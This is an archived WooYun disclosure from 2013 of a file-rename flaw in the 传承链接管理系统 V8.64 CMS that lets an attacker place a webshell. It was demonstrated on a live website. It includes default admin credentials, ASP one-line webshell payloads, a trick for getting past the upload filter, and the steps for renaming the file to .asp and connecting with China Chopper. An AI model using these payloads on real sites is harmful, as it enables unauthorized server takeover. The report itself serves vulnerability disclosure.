当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024963

漏洞标题:传承链接管理系统 V8.64可绕过检测拿Shell

相关厂商:pplms.com

漏洞作者: 流影

提交时间:2013-06-04 16:11

修复时间:2013-09-02 16:12

公开时间:2013-09-02 16:12

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-04: 细节已通知厂商并且等待厂商处理中
2013-06-04: 厂商已经确认,细节仅向厂商公开
2013-06-07: 细节向第三方安全合作伙伴开放
2013-07-29: 细节向核心白帽子及相关领域专家公开
2013-08-08: 细节向普通白帽子公开
2013-08-18: 细节向实习白帽子公开
2013-09-02: 细节向公众公开

简要描述:

传承链接管理系统 V8.64存在一个后台的文件更名漏洞.从而很轻松拿到Shell

详细说明:

本人提交的第一个洞洞.求乌云的老大们给个邀请哦~
测试站点:
http://3gw.asia
该网站用的是传承链接管理系统,就拿他做演示吧
首先找到他的后台页面,这个我们直接地址后面加/admin/就进去了
到了这个登陆界面

QQ截图20130601210240.jpg


默认帐号admin
密码admin888
认证码8888
点击确定来到后台
展开系统管理这里

QQ截图20130601210557.jpg


我们看到了一个Sql语句直接执行的连接,可是不知道是我方法不对还是怎么得 最后的时候没法写出表~
我执行语句

create table cmd(cmd text)


QQ截图20130601210800.jpg


这样创建了一个cmd表 我们在里面插入一句话

insert into cmd values('<%eval request("liuying")%>')


QQ截图20130601211002.jpg


可是还没有得到网站物理路径呢
这个从系统管理-备份恢复数据库 这里就可以找到了

QQ截图20130601211141.jpg


d:\freehost\kulew888\web\link1\据推测这个应该就是该网站的根目录了
直接在这里写出一句话
select [cmd] from [cmd] into outfile "d:\freehost\kulew888\web\link1\1.asp"

QQ截图20130601211141.jpg


失败~
没办法 只能在找其他的上传点了.(备份恢复数据库 写入一句话这个我也试过了 不可以的)
真正的问题还在后面.

QQ截图20130601212229.jpg


打开这里 发现有可以利用的

QQ截图20130601212338.jpg


这个可以直接新建
简单的试了一下
不允许直接新建asp文件,并且里面也不能有<%这样的内容

QQ截图20130601212443.jpg


QQ截图20130601212443.jpg


于是我先新建一个html文件 内容写的就是无%的一句话

<script language="VBSCRIPT" runat="server">execute request("liuying")</script>


提示非法,包含一句话

QQ截图20130601212905.jpg


稍微修改下带代码

<script language="VBSCRIPT" runat="server">eval request("liuying")</script>


替换execute为eval后成功生成了1.html

QQ截图20130601213025.jpg


html是无法成功运行我们的asp一句话的 可是这个系统这里有问题...
可以直接修改后缀名

QQ截图20130601213050.jpg


修改为1.asp后保存成功

QQ截图20130601213209.jpg


找到刚才显示的路径

QQ截图20130601213243.jpg


http://3gw.asia/Template/1.asp 成功~
菜刀连接之~

漏洞证明:

QQ截图20130601213347.jpg

修复方案:

修改默认密码,重命名文件那里编写过滤规则,我只是一彩笔,你们比我懂

版权声明:转载请注明来源 流影@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-06-04 17:39

厂商回复:

漏洞都补好了!

最新状态:

暂无